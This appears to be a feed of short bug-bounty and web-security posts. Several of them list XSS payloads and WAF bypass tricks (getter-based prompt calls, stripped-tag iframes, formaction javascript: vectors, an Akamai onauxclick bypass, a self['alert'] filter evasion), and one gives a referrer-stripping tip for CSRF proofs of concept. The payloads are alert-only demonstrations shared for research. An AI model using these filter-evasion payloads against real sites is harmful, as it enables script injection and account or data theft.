Search results
  1. 15 minutes ago

    Repost of a payload I posted before without any parenthesis after "prompt"! Object.defineProperty(window, 'p', { get: prompt });p; By using a Getter, we invoke the prompt without any input! Ideal for bypassing WAF!

  2. 2 hours ago

    A Magecart group has expanded its operations by compromising not only an Olympic ticket reseller but also a number of other websites referencing a single malicious domain hosting the underlying skimmer code.

  3. 3 hours ago

    XSS filter bypass using stripped </p> tag to obfuscate. P2 Stored XSS $1500 on a private bug bounty program. XSS Payload: <</p>iframe src=javascript:alert()//

  4. 7 hours ago
  5. 10 hours ago
  6. 10 hours ago
  7. Feb 2

    this is just the beginning.

  8. Feb 1

    Form Hijacking <form action=javascript:alert(1)// <form><button formaction=javascript&colon;alert(1)>xss <form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;> <form id="test" /><button form="test" formaction="javascript:alert()">xss

  9. Feb 1

    Found and reported multiple stored vulnerabilities in popular plugin Strong Testimonials (90,000+ active installations). Issue has been fixed in the latest release. Update immediately!

  10. Feb 1

    Xss Bug found with PoC video techsanar web.

  11. Feb 1

    I just got a fancy idea to create strings in without using dangerous characters 😃 Inspired by challenge from .

  12. Jan 31

    Akamai WAF Bypass, worked on a recent program <x onauxclick=a=alert,a(domain)>click

  13. Jan 31

    Neat xss payload required to bypass filters: 1. No periods allowed 2. Regex filter on text followed by '(' Blocking "alert(, confirm(, etc", but the self['alert']( got by the filter Payload: ?t=test'*self['alert'](document['domain'])*'test

  14. Jan 31

    via POST originated from VPS doesn't work because victim checks the value of Referrer Header? Just remove the header from your POC and try again: <meta name="referrer" content="no-referrer" />

  15. Jan 29
  16. Jan 28

    I guess thinks parenthesis is signs of

  17. Jan 27
  18. Jan 27

    Hey guys, I'm pretty inexperienced in so are there any attributes that are nice to know? Something like onclick or onerror but without interaction and without causing an error?
